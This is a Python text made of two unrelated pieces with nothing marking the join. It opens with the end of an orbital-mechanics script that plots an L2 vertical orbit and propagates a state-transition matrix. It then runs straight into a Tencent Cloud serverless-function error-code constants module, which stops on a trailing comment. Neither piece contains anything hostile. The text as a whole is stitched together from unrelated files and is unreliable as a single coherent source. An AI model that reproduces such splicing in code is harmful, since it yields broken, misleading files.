ax.set_title("L2 Vertical orbit")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "g")
plt.show()


# -- Propagate STM

# propagate base trajectory with state-transition-matrix
# (reuses r0, v0 and tofs of the vertical orbit defined above)
STM0 = np.eye(6)  # identity: the STM of the state w.r.t. itself at t0
rf, vf, STM = propagateSTM(mu, r0, v0, STM0, tofs, rtol=1e-11)

# STM is a matrix of partial derivatives which are used in Newton-Raphson
# methods for trajectory design

# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


# Error code constants for the SCF (Serverless Cloud Function) API.
# Each constant maps to the dotted error-code string returned by the service.

# Operation failed.
FAILEDOPERATION = 'FailedOperation'

# Failed to create the API Gateway trigger.
FAILEDOPERATION_APIGATEWAY = 'FailedOperation.ApiGateway'

# Failed to create the trigger.
FAILEDOPERATION_APIGW = 'FailedOperation.Apigw'

# Failed to get the APM InstanceId.
FAILEDOPERATION_APMCONFIGINSTANCEID = 'FailedOperation.ApmConfigInstanceId'

# The current async event status does not support this operation; please try again later.
FAILEDOPERATION_ASYNCEVENTSTATUS = 'FailedOperation.AsyncEventStatus'

# Failed to copy the function.
FAILEDOPERATION_COPYFAILED = 'FailedOperation.CopyFailed'

# Copying to this region is not supported.
FAILEDOPERATION_COPYFUNCTION = 'FailedOperation.CopyFunction'

# Failed to operate on the COS resource.
FAILEDOPERATION_COS = 'FailedOperation.Cos'

# Failed to create the alias.
FAILEDOPERATION_CREATEALIAS = 'FailedOperation.CreateAlias'

# Operation failed.
FAILEDOPERATION_CREATEFUNCTION = 'FailedOperation.CreateFunction'

# Failed to create the namespace.
FAILEDOPERATION_CREATENAMESPACE = 'FailedOperation.CreateNamespace'

# This operation cannot be performed in the current function state.
FAILEDOPERATION_CREATETRIGGER = 'FailedOperation.CreateTrigger'

# This operation cannot be performed in the current debug state.
FAILEDOPERATION_DEBUGMODESTATUS = 'FailedOperation.DebugModeStatus'

# The execution timeout cannot be updated while in debug mode.
FAILEDOPERATION_DEBUGMODEUPDATETIMEOUTFAIL = 'FailedOperation.DebugModeUpdateTimeOutFail'

# Failed to delete the alias.
FAILEDOPERATION_DELETEALIAS = 'FailedOperation.DeleteAlias'

# This operation cannot be performed in the current function state; retry when the function state is normal.
FAILEDOPERATION_DELETEFUNCTION = 'FailedOperation.DeleteFunction'

# Failed to delete the layer version.
FAILEDOPERATION_DELETELAYERVERSION = 'FailedOperation.DeleteLayerVersion'

# The default namespace cannot be deleted.
FAILEDOPERATION_DELETENAMESPACE = 'FailedOperation.DeleteNamespace'

# Failed to delete the trigger.
FAILEDOPERATION_DELETETRIGGER = 'FailedOperation.DeleteTrigger'

# The function code cannot be updated in the current state; update when the state is normal.
FAILEDOPERATION_FUNCTIONNAMESTATUSERROR = 'FailedOperation.FunctionNameStatusError'

# The function is being deployed, so this operation cannot be performed.
FAILEDOPERATION_FUNCTIONSTATUSERROR = 'FailedOperation.FunctionStatusError'

# This operation cannot be performed in the current function version state; retry when the version state is normal.
FAILEDOPERATION_FUNCTIONVERSIONSTATUSNOTACTIVE = 'FailedOperation.FunctionVersionStatusNotActive'

# Failed to get alias information.
FAILEDOPERATION_GETALIAS = 'FailedOperation.GetAlias'

# Failed to get the function code address.
FAILEDOPERATION_GETFUNCTIONADDRESS = 'FailedOperation.GetFunctionAddress'

# The current account or namespace is in arrears; retry when it is available.
FAILEDOPERATION_INSUFFICIENTBALANCE = 'FailedOperation.InsufficientBalance'

# Failed to invoke the function.
FAILEDOPERATION_INVOKEFUNCTION = 'FailedOperation.InvokeFunction'

# The namespace already exists; do not create it again.
FAILEDOPERATION_NAMESPACE = 'FailedOperation.Namespace'

# Failed to activate the service.
FAILEDOPERATION_OPENSERVICE = 'FailedOperation.OpenService'

# Operation conflict.
FAILEDOPERATION_OPERATIONCONFLICT = 'FailedOperation.OperationConflict'

# Failed to create the scheduled provisioning task.
FAILEDOPERATION_PROVISIONCREATETIMER = 'FailedOperation.ProvisionCreateTimer'

# Failed to delete the scheduled provisioning task.
FAILEDOPERATION_PROVISIONDELETETIMER = 'FailedOperation.ProvisionDeleteTimer'

# A provisioned-concurrency task is already in progress for this function version; please try again later.
FAILEDOPERATION_PROVISIONEDINPROGRESS = 'FailedOperation.ProvisionedInProgress'

# Failed to publish the layer version.
FAILEDOPERATION_PUBLISHLAYERVERSION = 'FailedOperation.PublishLayerVersion'

# A version cannot be published in the current function state; publish when the state is normal.
FAILEDOPERATION_PUBLISHVERSION = 'FailedOperation.PublishVersion'

# The role does not exist.
FAILEDOPERATION_QCSROLENOTFOUND = 'FailedOperation.QcsRoleNotFound'

# A reserved-concurrency configuration task is already in progress for this function; please try again later.
FAILEDOPERATION_RESERVEDINPROGRESS = 'FailedOperation.ReservedInProgress'

# The topic does not exist.
FAILEDOPERATION_TOPICNOTEXIST = 'FailedOperation.TopicNotExist'

# A user concurrency memory quota configuration task is in progress; please try again later.
FAILEDOPERATION_TOTALCONCURRENCYMEMORYINPROGRESS = 'FailedOperation.TotalConcurrencyMemoryInProgress'

# The specified service is not activated; submit a ticket to request activation.
FAILEDOPERATION_UNOPENEDSERVICE = 'FailedOperation.UnOpenedService'

# Failed to update the alias.
FAILEDOPERATION_UPDATEALIAS = 'FailedOperation.UpdateAlias'

# The function code cannot be updated in the current state; update when the state is normal.
FAILEDOPERATION_UPDATEFUNCTIONCODE = 'FailedOperation.UpdateFunctionCode'

# The UpdateFunctionConfiguration operation failed.
FAILEDOPERATION_UPDATEFUNCTIONCONFIGURATION = 'FailedOperation.UpdateFunctionConfiguration'

# Internal error.
INTERNALERROR = 'InternalError'

# Internal error when creating the API Gateway trigger.
INTERNALERROR_APIGATEWAY = 'InternalError.ApiGateway'

# The Ckafka API call failed.
INTERNALERROR_CKAFKA = 'InternalError.Ckafka'

# Failed to delete the CMQ trigger.
INTERNALERROR_CMQ = 'InternalError.Cmq'

# Failed to update the trigger.
INTERNALERROR_COS = 'InternalError.Cos'

# ES error.
INTERNALERROR_ES = 'InternalError.ES'

# Internal service exception.
INTERNALERROR_EXCEPTION = 'InternalError.Exception'

# Internal service error.
INTERNALERROR_GETROLEERROR = 'InternalError.GetRoleError'

# Internal system error.
INTERNALERROR_SYSTEM = 'InternalError.System'

# Internal service error.
INTERNALERROR_SYSTEMERROR = 'InternalError.SystemError'

# The FunctionName value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETER_FUNCTIONNAME = 'InvalidParameter.FunctionName'

# Invalid request parameter.
INVALIDPARAMETER_PAYLOAD = 'InvalidParameter.Payload'

# Invalid RoutingConfig parameter.
INVALIDPARAMETER_ROUTINGCONFIG = 'InvalidParameter.RoutingConfig'

# Invalid parameter value.
INVALIDPARAMETERVALUE = 'InvalidParameterValue'

# The Action value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_ACTION = 'InvalidParameterValue.Action'

# Invalid AdditionalVersionWeights parameter.
INVALIDPARAMETERVALUE_ADDITIONALVERSIONWEIGHTS = 'InvalidParameterValue.AdditionalVersionWeights'

# Deleting the default alias is not supported; fix and retry.
INVALIDPARAMETERVALUE_ALIAS = 'InvalidParameterValue.Alias'

# Invalid ApiGateway parameter.
INVALIDPARAMETERVALUE_APIGATEWAY = 'InvalidParameterValue.ApiGateway'

# Invalid ApmConfig parameter.
INVALIDPARAMETERVALUE_APMCONFIG = 'InvalidParameterValue.ApmConfig'

# Invalid ApmConfigInstanceId parameter.
INVALIDPARAMETERVALUE_APMCONFIGINSTANCEID = 'InvalidParameterValue.ApmConfigInstanceId'

# Invalid ApmConfigRegion parameter.
INVALIDPARAMETERVALUE_APMCONFIGREGION = 'InvalidParameterValue.ApmConfigRegion'

# Invalid Args parameter value.
INVALIDPARAMETERVALUE_ARGS = 'InvalidParameterValue.Args'

# Invalid function async retry configuration parameter.
INVALIDPARAMETERVALUE_ASYNCTRIGGERCONFIG = 'InvalidParameterValue.AsyncTriggerConfig'

# Invalid Cdn input.
INVALIDPARAMETERVALUE_CDN = 'InvalidParameterValue.Cdn'

# Duplicate CFS configuration item.
INVALIDPARAMETERVALUE_CFSPARAMETERDUPLICATE = 'InvalidParameterValue.CfsParameterDuplicate'

# The CFS configuration value does not conform to the specification.
INVALIDPARAMETERVALUE_CFSPARAMETERERROR = 'InvalidParameterValue.CfsParameterError'

# The CFS parameter format does not conform to the specification.
INVALIDPARAMETERVALUE_CFSSTRUCTIONERROR = 'InvalidParameterValue.CfsStructionError'

# Invalid Ckafka input.
INVALIDPARAMETERVALUE_CKAFKA = 'InvalidParameterValue.Ckafka'

# Invalid parameter passed when running the function.
INVALIDPARAMETERVALUE_CLIENTCONTEXT = 'InvalidParameterValue.ClientContext'

# Invalid Cls input.
INVALIDPARAMETERVALUE_CLS = 'InvalidParameterValue.Cls'

# Modifying the Cls configuration requires the Role parameter; fix and retry.
INVALIDPARAMETERVALUE_CLSROLE = 'InvalidParameterValue.ClsRole'

# Invalid Cmq input.
INVALIDPARAMETERVALUE_CMQ = 'InvalidParameterValue.Cmq'

# Invalid Code input.
INVALIDPARAMETERVALUE_CODE = 'InvalidParameterValue.Code'

# Invalid CodeSecret input.
INVALIDPARAMETERVALUE_CODESECRET = 'InvalidParameterValue.CodeSecret'

# Invalid CodeSource input.
INVALIDPARAMETERVALUE_CODESOURCE = 'InvalidParameterValue.CodeSource'

# Invalid Command[Entrypoint] parameter value.
INVALIDPARAMETERVALUE_COMMAND = 'InvalidParameterValue.Command'

# Invalid CompatibleRuntimes parameter.
INVALIDPARAMETERVALUE_COMPATIBLERUNTIMES = 'InvalidParameterValue.CompatibleRuntimes'

# Invalid Content parameter.
INVALIDPARAMETERVALUE_CONTENT = 'InvalidParameterValue.Content'

# Invalid Cos input.
INVALIDPARAMETERVALUE_COS = 'InvalidParameterValue.Cos'

# CosBucketName does not conform to the specification.
INVALIDPARAMETERVALUE_COSBUCKETNAME = 'InvalidParameterValue.CosBucketName'

# The CosBucketRegion value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_COSBUCKETREGION = 'InvalidParameterValue.CosBucketRegion'

# CosObjectName does not conform to the specification.
INVALIDPARAMETERVALUE_COSOBJECTNAME = 'InvalidParameterValue.CosObjectName'

# The CustomArgument parameter exceeds the length limit.
INVALIDPARAMETERVALUE_CUSTOMARGUMENT = 'InvalidParameterValue.CustomArgument'

# Invalid DateTime input.
INVALIDPARAMETERVALUE_DATETIME = 'InvalidParameterValue.DateTime'

# The DeadLetterConfig value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_DEADLETTERCONFIG = 'InvalidParameterValue.DeadLetterConfig'

# The default namespace cannot be created.
INVALIDPARAMETERVALUE_DEFAULTNAMESPACE = 'InvalidParameterValue.DefaultNamespace'

# Invalid Description input.
INVALIDPARAMETERVALUE_DESCRIPTION = 'InvalidParameterValue.Description'

# Invalid DNS[OS_NAMESERVER] environment variable configuration.
INVALIDPARAMETERVALUE_DNSINFO = 'InvalidParameterValue.DnsInfo'

# Invalid EipConfig parameter.
INVALIDPARAMETERVALUE_EIPCONFIG = 'InvalidParameterValue.EipConfig'

# The Enable value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_ENABLE = 'InvalidParameterValue.Enable'

# Invalid Environment input.
INVALIDPARAMETERVALUE_ENVIRONMENT = 'InvalidParameterValue.Environment'

# The environment variables exceed the size limit; keep them within 4 KB.
INVALIDPARAMETERVALUE_ENVIRONMENTEXCEEDEDLIMIT = 'InvalidParameterValue.EnvironmentExceededLimit'

# Modifying the function's system and runtime environment variables is not supported.
INVALIDPARAMETERVALUE_ENVIRONMENTSYSTEMPROTECT = 'InvalidParameterValue.EnvironmentSystemProtect'

# Invalid Filters parameter.
INVALIDPARAMETERVALUE_FILTERS = 'InvalidParameterValue.Filters'

# The Function value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_FUNCTION = 'InvalidParameterValue.Function'

# The function does not exist.
INVALIDPARAMETERVALUE_FUNCTIONNAME = 'InvalidParameterValue.FunctionName'

# GitBranch does not conform to the specification.
INVALIDPARAMETERVALUE_GITBRANCH = 'InvalidParameterValue.GitBranch'

# The GitCommitId value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_GITCOMMITID = 'InvalidParameterValue.GitCommitId'

# GitDirectory does not conform to the specification.
INVALIDPARAMETERVALUE_GITDIRECTORY = 'InvalidParameterValue.GitDirectory'

# GitPassword does not conform to the specification.
INVALIDPARAMETERVALUE_GITPASSWORD = 'InvalidParameterValue.GitPassword'

# GitUrl does not conform to the specification.
INVALIDPARAMETERVALUE_GITURL = 'InvalidParameterValue.GitUrl'

# GitUserName does not conform to the specification.
INVALIDPARAMETERVALUE_GITUSERNAME = 'InvalidParameterValue.GitUserName'

# Invalid Handler input.
INVALIDPARAMETERVALUE_HANDLER = 'InvalidParameterValue.Handler'

# Invalid IdleTimeOut parameter.
INVALIDPARAMETERVALUE_IDLETIMEOUT = 'InvalidParameterValue.IdleTimeOut'

# Invalid imageUri input.
INVALIDPARAMETERVALUE_IMAGEURI = 'InvalidParameterValue.ImageUri'

# Invalid InlineZipFile.
INVALIDPARAMETERVALUE_INLINEZIPFILE = 'InvalidParameterValue.InlineZipFile'

# The InvokeType value does not conform to the specification; fix it and try again.
INVALIDPARAMETERVALUE_INVOKETYPE = 'InvalidParameterValue.InvokeType'

# The L5Enable value does not conform to the specification; fix it and try again.
INVALIDPARAMETERVALUE_L5ENABLE = 'InvalidParameterValue.L5Enable'

# Invalid LayerName parameter.
INVALIDPARAMETERVALUE_LAYERNAME = 'InvalidParameterValue.LayerName'

# Invalid Layers parameter.
INVALIDPARAMETERVALUE_LAYERS = 'InvalidParameterValue.Layers'

# Invalid Limit input.
INVALIDPARAMETERVALUE_LIMIT = 'InvalidParameterValue.Limit'

# The parameter exceeds the length limit.
INVALIDPARAMETERVALUE_LIMITEXCEEDED = 'InvalidParameterValue.LimitExceeded'

# The Memory value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_MEMORY = 'InvalidParameterValue.Memory'

# Invalid MemorySize.
INVALIDPARAMETERVALUE_MEMORYSIZE = 'InvalidParameterValue.MemorySize'

# Invalid MinCapacity parameter.
INVALIDPARAMETERVALUE_MINCAPACITY = 'InvalidParameterValue.MinCapacity'

# Invalid Name parameter.
INVALIDPARAMETERVALUE_NAME = 'InvalidParameterValue.Name'

# Invalid Namespace parameter.
INVALIDPARAMETERVALUE_NAMESPACE = 'InvalidParameterValue.Namespace'

# Invalid format: Namespace must consist of letters, digits, - and _, up to 30 characters.
INVALIDPARAMETERVALUE_NAMESPACEINVALID = 'InvalidParameterValue.NamespaceInvalid'

# Invalid NodeSpec parameter.
INVALIDPARAMETERVALUE_NODESPEC = 'InvalidParameterValue.NodeSpec'

# Invalid NodeType parameter.
INVALIDPARAMETERVALUE_NODETYPE = 'InvalidParameterValue.NodeType'

# Invalid offset.
INVALIDPARAMETERVALUE_OFFSET = 'InvalidParameterValue.Offset'

# Invalid Order input.
INVALIDPARAMETERVALUE_ORDER = 'InvalidParameterValue.Order'

# The OrderBy value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_ORDERBY = 'InvalidParameterValue.OrderBy'

# The input parameter is not valid JSON.
INVALIDPARAMETERVALUE_PARAM = 'InvalidParameterValue.Param'

# Invalid ProtocolType parameter.
INVALIDPARAMETERVALUE_PROTOCOLTYPE = 'InvalidParameterValue.ProtocolType'

# Duplicate cron configuration for scheduled provisioning.
INVALIDPARAMETERVALUE_PROVISIONTRIGGERCRONCONFIGDUPLICATE = 'InvalidParameterValue.ProvisionTriggerCronConfigDuplicate'

# Invalid TriggerName parameter.
INVALIDPARAMETERVALUE_PROVISIONTRIGGERNAME = 'InvalidParameterValue.ProvisionTriggerName'

# Duplicate TriggerName.
INVALIDPARAMETERVALUE_PROVISIONTRIGGERNAMEDUPLICATE = 'InvalidParameterValue.ProvisionTriggerNameDuplicate'

# Invalid ProvisionType parameter.
INVALIDPARAMETERVALUE_PROVISIONTYPE = 'InvalidParameterValue.ProvisionType'

# Invalid PublicNetConfig parameter.
INVALIDPARAMETERVALUE_PUBLICNETCONFIG = 'InvalidParameterValue.PublicNetConfig'

# Unsupported function version.
INVALIDPARAMETERVALUE_QUALIFIER = 'InvalidParameterValue.Qualifier'

# Invalid Enterprise Edition image instance ID [RegistryId].
INVALIDPARAMETERVALUE_REGISTRYID = 'InvalidParameterValue.RegistryId'

# Invalid RetCode.
INVALIDPARAMETERVALUE_RETCODE = 'InvalidParameterValue.RetCode'

# The RoutingConfig value does not conform to the specification; fix it and try again. See: https://tencentcs.com/5jXKFnBW.
INVALIDPARAMETERVALUE_ROUTINGCONFIG = 'InvalidParameterValue.RoutingConfig'

# Invalid Runtime input.
INVALIDPARAMETERVALUE_RUNTIME = 'InvalidParameterValue.Runtime'

# searchkey is not Keyword, Tag, or Runtime.
INVALIDPARAMETERVALUE_SEARCHKEY = 'InvalidParameterValue.SearchKey'

# Invalid SecretInfo.
INVALIDPARAMETERVALUE_SECRETINFO = 'InvalidParameterValue.SecretInfo'

# ServiceName does not conform to the naming convention.
INVALIDPARAMETERVALUE_SERVICENAME = 'InvalidParameterValue.ServiceName'

# The Stamp value does not conform to the specification; fix it and try again.
INVALIDPARAMETERVALUE_STAMP = 'InvalidParameterValue.Stamp'

# Invalid start time.
INVALIDPARAMETERVALUE_STARTTIME = 'InvalidParameterValue.StartTime'

# The start date and end date must be specified together.
INVALIDPARAMETERVALUE_STARTTIMEORENDTIME = 'InvalidParameterValue.StartTimeOrEndTime'

# The Status value does not conform to the specification; fix it and try again.
INVALIDPARAMETERVALUE_STATUS = 'InvalidParameterValue.Status'

# Invalid system environment variable.
INVALIDPARAMETERVALUE_SYSTEMENVIRONMENT = 'InvalidParameterValue.SystemEnvironment'

# Invalid TempCosObjectName.
INVALIDPARAMETERVALUE_TEMPCOSOBJECTNAME = 'InvalidParameterValue.TempCosObjectName'

# The TraceEnable value does not conform to the specification; fix it and try again.
INVALIDPARAMETERVALUE_TRACEENABLE = 'InvalidParameterValue.TraceEnable'

# Invalid TrackingTarget parameter.
INVALIDPARAMETERVALUE_TRACKINGTARGET = 'InvalidParameterValue.TrackingTarget'

# Invalid TriggerCronConfig parameter.
INVALIDPARAMETERVALUE_TRIGGERCRONCONFIG = 'InvalidParameterValue.TriggerCronConfig'

# The scheduled trigger interval in TriggerCronConfig is less than the specified value.
INVALIDPARAMETERVALUE_TRIGGERCRONCONFIGTIMEINTERVAL = 'InvalidParameterValue.TriggerCronConfigTimeInterval'

# Invalid TriggerDesc parameter.
INVALIDPARAMETERVALUE_TRIGGERDESC = 'InvalidParameterValue.TriggerDesc'

# Invalid TriggerName input.
INVALIDPARAMETERVALUE_TRIGGERNAME = 'InvalidParameterValue.TriggerName'

# Invalid TriggerProvisionedConcurrencyNum parameter.
INVALIDPARAMETERVALUE_TRIGGERPROVISIONEDCONCURRENCYNUM = 'InvalidParameterValue.TriggerProvisionedConcurrencyNum'

# Invalid Type input.
INVALIDPARAMETERVALUE_TYPE = 'InvalidParameterValue.Type'

# VPC must be enabled when the CFS configuration is enabled.
INVALIDPARAMETERVALUE_VPCNOTSETWHENOPENCFS = 'InvalidParameterValue.VpcNotSetWhenOpenCfs'

# Invalid WebSocketsParams parameter.
INVALIDPARAMETERVALUE_WEBSOCKETSPARAMS = 'InvalidParameterValue.WebSocketsParams'

# The file is not a valid zip archive; recompress it and try again.
INVALIDPARAMETERVALUE_ZIPFILE = 'InvalidParameterValue.ZipFile'

# Base64 decoding of the archive failed: `Incorrect padding`; fix it and try again.
INVALIDPARAMETERVALUE_ZIPFILEBASE64BINASCIIERROR = 'InvalidParameterValue.ZipFileBase64BinasciiError'

# The number of aliases exceeds the maximum limit.
LIMITEXCEEDED_ALIAS = 'LimitExceeded.Alias'

# CDN usage exceeds the maximum limit.
LIMITEXCEEDED_CDN = 'LimitExceeded.Cdn'

# EIP resources exceed the limit.
LIMITEXCEEDED_EIP = 'LimitExceeded.Eip'

# The number of functions exceeds the maximum limit; you can [submit a ticket](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex) to request a higher limit.
LIMITEXCEEDED_FUNCTION = 'LimitExceeded.Function'

# The number of functions under the same topic exceeds the maximum limit.
LIMITEXCEEDED_FUNCTIONONTOPIC = 'LimitExceeded.FunctionOnTopic'

# FunctionProvisionedConcurrencyMemory has reached the limit; submit a ticket to request a higher limit: https://tencentcs.com/7Fixwt63.
LIMITEXCEEDED_FUNCTIONPROVISIONEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionProvisionedConcurrencyMemory'

# The function reserved concurrency memory exceeds the limit.
LIMITEXCEEDED_FUNCTIONRESERVEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionReservedConcurrencyMemory'

# FunctionTotalProvisionedConcurrencyMemory has reached the limit; submit a ticket to request a higher limit: https://tencentcs.com/7Fixwt63.
LIMITEXCEEDED_FUNCTIONTOTALPROVISIONEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionTotalProvisionedConcurrencyMemory'

# The total provisioned concurrency of the function has reached the limit.
LIMITEXCEEDED_FUNCTIONTOTALPROVISIONEDCONCURRENCYNUM = 'LimitExceeded.FunctionTotalProvisionedConcurrencyNum'

# InitTimeout has reached the limit; submit a ticket to request a higher limit: https://tencentcs.com/7Fixwt63.
LIMITEXCEEDED_INITTIMEOUT = 'LimitExceeded.InitTimeout'

# The number of layer versions exceeds the maximum limit.
LIMITEXCEEDED_LAYERVERSIONS = 'LimitExceeded.LayerVersions'

# The number of layers exceeds the maximum limit.
LIMITEXCEEDED_LAYERS = 'LimitExceeded.Layers'

# Memory exceeds the maximum limit.
LIMITEXCEEDED_MEMORY = 'LimitExceeded.Memory'

# The message retention time in the function async retry configuration exceeds the limit.
LIMITEXCEEDED_MSGTTL = 'LimitExceeded.MsgTTL'

# The number of namespaces exceeds the maximum limit; you can [submit a ticket](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex) to request a higher limit.
LIMITEXCEEDED_NAMESPACE = 'LimitExceeded.Namespace'

# Offset exceeds the limit.
LIMITEXCEEDED_OFFSET = 'LimitExceeded.Offset'

# The number of scheduled provisioning tasks exceeds the maximum limit.
LIMITEXCEEDED_PROVISIONTRIGGERACTION = 'LimitExceeded.ProvisionTriggerAction'

# The scheduled trigger interval is below the allowed limit.
LIMITEXCEEDED_PROVISIONTRIGGERINTERVAL = 'LimitExceeded.ProvisionTriggerInterval'

# Quota exceeded.
LIMITEXCEEDED_QUOTA = 'LimitExceeded.Quota'

# The async retry count in the function async retry configuration exceeds the limit.
LIMITEXCEEDED_RETRYNUM = 'LimitExceeded.RetryNum'

# Timeout exceeds the maximum limit.
LIMITEXCEEDED_TIMEOUT = 'LimitExceeded.Timeout'

# The user concurrency memory quota exceeds the limit.
LIMITEXCEEDED_TOTALCONCURRENCYMEMORY = 'LimitExceeded.TotalConcurrencyMemory'

# The number of triggers exceeds the maximum limit; you can [submit a ticket](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex) to request a higher limit.
LIMITEXCEEDED_TRIGGER = 'LimitExceeded.Trigger'

# UserTotalConcurrencyMemory has reached the limit; submit a ticket to request a higher limit: https://tencentcs.com/7Fixwt63.
LIMITEXCEEDED_USERTOTALCONCURRENCYMEMORY = 'LimitExceeded.UserTotalConcurrencyMemory'

# Missing parameter.
MISSINGPARAMETER = 'MissingParameter'

# Code was not provided.
MISSINGPARAMETER_CODE = 'MissingParameter.Code'

# The Runtime field is missing.
MISSINGPARAMETER_RUNTIME = 'MissingParameter.Runtime'

# The resource is in use.
RESOURCEINUSE = 'ResourceInUse'

# The alias is already in use.
RESOURCEINUSE_ALIAS = 'ResourceInUse.Alias'

# The Cdn is already in use.
RESOURCEINUSE_CDN = 'ResourceInUse.Cdn'

# The Cmq is already in use.
RESOURCEINUSE_CMQ = 'ResourceInUse.Cmq'

# The Cos is already in use.
RESOURCEINUSE_COS = 'ResourceInUse.Cos'

# The function already exists.
RESOURCEINUSE_FUNCTION = 'ResourceInUse.Function'

# The FunctionName already exists.
RESOURCEINUSE_FUNCTIONNAME = 'ResourceInUse.FunctionName'

# The layer version is in use.
RESOURCEINUSE_LAYERVERSION = 'ResourceInUse.LayerVersion'

# The namespace already exists.
RESOURCEINUSE_NAMESPACE = 'ResourceInUse.Namespace'

# The TriggerName already exists.
RESOURCEINUSE_TRIGGER = 'ResourceInUse.Trigger'

# The TriggerName already exists.
RESOURCEINUSE_TRIGGERNAME = 'ResourceInUse.TriggerName'

# Insufficient COS resources.
RESOURCEINSUFFICIENT_COS = 'ResourceInsufficient.COS'

# The resource does not exist.
RESOURCENOTFOUND = 'ResourceNotFound'

# The alias does not exist.
RESOURCENOTFOUND_ALIAS = 'ResourceNotFound.Alias'

# The specified AsyncEvent was not found; create it and try again.
RESOURCENOTFOUND_ASYNCEVENT = 'ResourceNotFound.AsyncEvent'

# The Cdn does not exist.
RESOURCENOTFOUND_CDN = 'ResourceNotFound.Cdn'

# The specified mount target was not found under the specified CFS instance.
RESOURCENOTFOUND_CFSMOUNTINSNOTMATCH = 'ResourceNotFound.CfsMountInsNotMatch'

# The CFS instance status is unavailable.
RESOURCENOTFOUND_CFSSTATUSERROR = 'ResourceNotFound.CfsStatusError'

# The CFS instance and the function are not in the same VPC.
RESOURCENOTFOUND_CFSVPCNOTMATCH = 'ResourceNotFound.CfsVpcNotMatch'

# The Ckafka instance does not exist.
RESOURCENOTFOUND_CKAFKA = 'ResourceNotFound.Ckafka'

# The Cmq does not exist.
RESOURCENOTFOUND_CMQ = 'ResourceNotFound.Cmq'

# The Cos does not exist.
RESOURCENOTFOUND_COS = 'ResourceNotFound.Cos'

# The demo does not exist.
RESOURCENOTFOUND_DEMO = 'ResourceNotFound.Demo'

# The function does not exist.
RESOURCENOTFOUND_FUNCTION = 'ResourceNotFound.Function'

# The function does not exist.
RESOURCENOTFOUND_FUNCTIONNAME = 'ResourceNotFound.FunctionName'

# The function version does not exist.
RESOURCENOTFOUND_FUNCTIONVERSION = 'ResourceNotFound.FunctionVersion'

# Error getting CFS mount target information.
RESOURCENOTFOUND_GETCFSMOUNTINSERROR = 'ResourceNotFound.GetCfsMountInsError'

# Error getting CFS information.
RESOURCENOTFOUND_GETCFSNOTMATCH = 'ResourceNotFound.GetCfsNotMatch'

# The specified ImageConfig was not found; create it and try again.
RESOURCENOTFOUND_IMAGECONFIG = 'ResourceNotFound.ImageConfig'

# The layer does not exist.
RESOURCENOTFOUND_LAYER = 'ResourceNotFound.Layer'

# The layer version does not exist.
RESOURCENOTFOUND_LAYERVERSION = 'ResourceNotFound.LayerVersion'

# The namespace does not exist.
RESOURCENOTFOUND_NAMESPACE = 'ResourceNotFound.Namespace'

# The version does not exist.
RESOURCENOTFOUND_QUALIFIER = 'ResourceNotFound.Qualifier'

# The role does not exist.
RESOURCENOTFOUND_ROLE = 'ResourceNotFound.Role'

# The role does not exist.
RESOURCENOTFOUND_ROLECHECK = 'ResourceNotFound.RoleCheck'

# The timer does not exist.
RESOURCENOTFOUND_TIMER = 'ResourceNotFound.Timer'

# The concurrency memory quota resource was not found.
RESOURCENOTFOUND_TOTALCONCURRENCYMEMORY = 'ResourceNotFound.TotalConcurrencyMemory'

# The trigger does not exist.
RESOURCENOTFOUND_TRIGGER = 'ResourceNotFound.Trigger'

# The version does not exist.
RESOURCENOTFOUND_VERSION = 'ResourceNotFound.Version'

# The VPC or subnet does not exist.
RESOURCENOTFOUND_VPC = 'ResourceNotFound.Vpc'

# Insufficient balance; please top up first.
RESOURCEUNAVAILABLE_INSUFFICIENTBALANCE = 'ResourceUnavailable.InsufficientBalance'

# The namespace is unavailable.
RESOURCEUNAVAILABLE_NAMESPACE = 'ResourceUnavailable.Namespace'

# Unauthorized operation.
UNAUTHORIZEDOPERATION = 'UnauthorizedOperation'

# CAM authentication failed.
UNAUTHORIZEDOPERATION_CAM = 'UnauthorizedOperation.CAM'

# No permission to access the code.
UNAUTHORIZEDOPERATION_CODESECRET = 'UnauthorizedOperation.CodeSecret'

# No permission.
UNAUTHORIZEDOPERATION_CREATETRIGGER = 'UnauthorizedOperation.CreateTrigger'

# Unauthorized operation.
UNAUTHORIZEDOPERATION_DELETEFUNCTION = 'UnauthorizedOperation.DeleteFunction'

# No permission.
UNAUTHORIZEDOPERATION_DELETETRIGGER = 'UnauthorizedOperation.DeleteTrigger'

# This API was not called from the console.
UNAUTHORIZEDOPERATION_NOTMC = 'UnauthorizedOperation.NotMC'

# Invalid region.
UNAUTHORIZEDOPERATION_REGION = 'UnauthorizedOperation.Region'

# No permission to access your Cos resources.
UNAUTHORIZEDOPERATION_ROLE = 'UnauthorizedOperation.Role'

# The TempCos Appid does not match the requesting account's APPID.
